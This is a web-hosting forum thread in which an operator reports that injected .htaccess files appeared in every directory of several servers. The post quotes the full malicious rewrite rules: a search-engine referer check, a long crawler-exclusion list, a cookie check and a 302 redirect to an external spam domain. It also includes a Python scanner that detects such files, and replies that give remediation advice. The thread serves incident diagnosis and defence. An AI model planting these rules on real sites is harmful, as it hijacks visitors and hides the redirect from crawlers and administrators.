Site compromised: .htaccess files everywhere

@Dunderdale272

Posted in: #Apache #Htaccess #ModRewrite #Security

Some of the sites we're hosting are compromised by... I don't know what.
Every directory on the webserver contains a .htaccess file which redirects a user coming from a search engine to a page which doesn't even exist - see the .htaccess file below.

The problem first appeared on 10 December 2010 and has been spreading ever since. It affected 8 servers at 3 different hosting providers.

I've found some links in Google to similar problems but no explanation as to what is going on. The solution is very simple: just delete the file, but that's not what I'm after. The redirect URL seems to be different for every infected domain, here's a list:


indanetwall.net
checkforsec.com
trackallnet.com
bonusforall.net
searchforallweb.com
sslabssys.com


Googling those leads to more people reporting the same problem using all kinds of different systems.

Apparently it had nothing to do with a specific server or a specific server configuration. All the latest updates were installed for the OS and installed CMS systems. It also affected servers without any CMS installed so we couldn't put the blame there.

We don't know how the files got there but it wasn't through ftp. In the end we changed all passwords for the ftp accounts, hosting provider account, databases, anything.

We did a thorough scan of all the servers and the local network but didn't find anything there. So the final conclusion is that somebody somehow got hold of a bunch of passwords to access our systems.

Luckily they didn't do any 'real' damage and in the end it was no more than a big annoyance... But it could've been much worse.

The htaccess file looks like this:

# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http://)?([^/?]*.)?(google.|yahoo.|bing.|msn.|yandex.|ask.|excite.|altavista.|netscape.|aol.|hotbot.|goto.|infoseek.|mamma.|alltheweb.|lycos.|search.|metacrawler.|rambler.|mail.|dogpile.|ya.|/search?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(q=cache:).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Accoona|AcesExplorer|Amfibi|AmigasOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|AsksJeeves|asterias|AtrenkosNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE-Preload|CFNetwork|cococ|Combine|Crawl|curl|Dangershiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|FcuksYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda-Search|HP-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus-Notes|Lycos|Lynx|Mac_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac_PPC|Macs10|MacsOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os=Mac|P900i|panscient|perl|PlayStation|POE-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Seriess60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|SoapsClient|Socialmarks|SpheresScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Wins9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windowss95|Windowss98|WindowssCE|WindowssNTs4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ searchforallweb.com/cgi-bin/r.cgi?p=9004&i=138ee363&j=315&m=c1ca5d58dda23245366719cd597ac0d5&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo


Has anyone experienced similar problems? Does someone know what this is and how we can stop it?

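An added example, not part of the original post or either answer: a small Python scanner that walks a web root and flags .htaccess files showing the traits of the injected rule set above (a condition on a search-engine referer, a 302 to an external host, and the CO= flag that drops a cookie so a visitor is redirected only once), reporting each file's modification time so it can be lined up against FTP and HTTP logs. The two sample .htaccess bodies are constructed, the malicious one being a trimmed copy of the rules quoted in the question.

```python
import os
import re
import tempfile
import time
# Constructed sample: a trimmed copy of the injected rule set quoted in the question.
SAMPLE_MALICIOUS = """# exgocgkctswo
RewriteCond %{HTTP_REFERER} ^(http://)?([^/?]*.)?(google.|yahoo.|bing.).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
RewriteRule ^(.*)$ http://searchforallweb.com/cgi-bin/r.cgi?h=%{HTTP_HOST} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo
"""
# Constructed benign .htaccess: an ordinary front-controller rewrite.
SAMPLE_BENIGN = """RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php?q=$1 [L,QSA]
"""

REFERER_COND = re.compile(r"RewriteCond\s+%\{HTTP_REFERER\}\s+.*(google|yahoo|bing|yandex)", re.I)
EXTERNAL_REDIRECT = re.compile(r"RewriteRule\s+\S+\s+(https?://)?[\w.-]+\.\w+/\S*\s+\[[^\]]*R=30[12]", re.I)
COOKIE_FLAG = re.compile(r"\bCO=\w+:")  # CO=name:value:domain:minutes drops a cookie on redirect

def classify(text):
    """Return the suspicious traits found in one .htaccess body (empty list if clean)."""
    traits = []
    if REFERER_COND.search(text):
        traits.append("redirect applies only to visitors arriving from a search engine")
    if EXTERNAL_REDIRECT.search(text):
        traits.append("302 redirect to an external host")
    if COOKIE_FLAG.search(text):
        traits.append("cookie set on redirect so each visitor is bounced only once")
    return traits

def scan_htaccess(root):
    """Walk root and return (path, mtime, traits) for every .htaccess with two or more traits."""
    findings = []
    for path in (os.path.join(d, ".htaccess") for d, _, f in os.walk(root) if ".htaccess" in f):
        with open(path, encoding="utf-8", errors="replace") as fh:
            traits = classify(fh.read())
        if len(traits) >= 2:  # a lone trait (e.g. a legitimate 301 to a new domain) is not enough
            mtime = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(os.path.getmtime(path)))
            findings.append((path, mtime, traits))  # mtime: compare against FTP/HTTP logs
    return findings

def demo():
    """Build a constructed webroot with one injected and one clean .htaccess, then scan it."""
    root = tempfile.mkdtemp(prefix="htscan_")
    for sub, body in (("site_a/images", SAMPLE_MALICIOUS), ("site_b", SAMPLE_BENIGN)):
        os.makedirs(os.path.join(root, sub))
        with open(os.path.join(root, sub, ".htaccess"), "w", encoding="utf-8") as fh:
            fh.write(body)
    return scan_htaccess(root)
```

Run scan_htaccess against a real document root to get the list of affected files with their timestamps; the demo() function only exercises the constructed samples.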

2 Comments

@Angela700

You need to check the date the files were uploaded and then review your FTP and HTTP logs. You probably allowed for file uploading via some script by not sanitizing your inputs for directory traversal, or you have a program running either on request or timed that drops these files in.

If it's a shared host, your host could be compromised, and they probably haven't set up their shares correctly to not allow for things like this. One of the other 'customers' is exploiting the server.


@Hamaas447

If you noticed it "at several hosting providers" then I would think it's highly likely something to do with a site on your server(s), not to do with the server itself, unless you're bringing over certain config files to new hosting providers etc.?

If I was you, I would enforce password changes; someone's got access to your server or directories that they shouldn't have?!

What about upload forms? Is anyone using a poorly secured one with no file upload restrictions?
FTP, does anyone have access that should not, can people access more than they should through it?

As I said, I would do password changes, and also do updates on any CMSs you might have running on there, e.g. Joomla etc., in case there are fixes for known security issues.

Hope that was at least slightly helpful :)
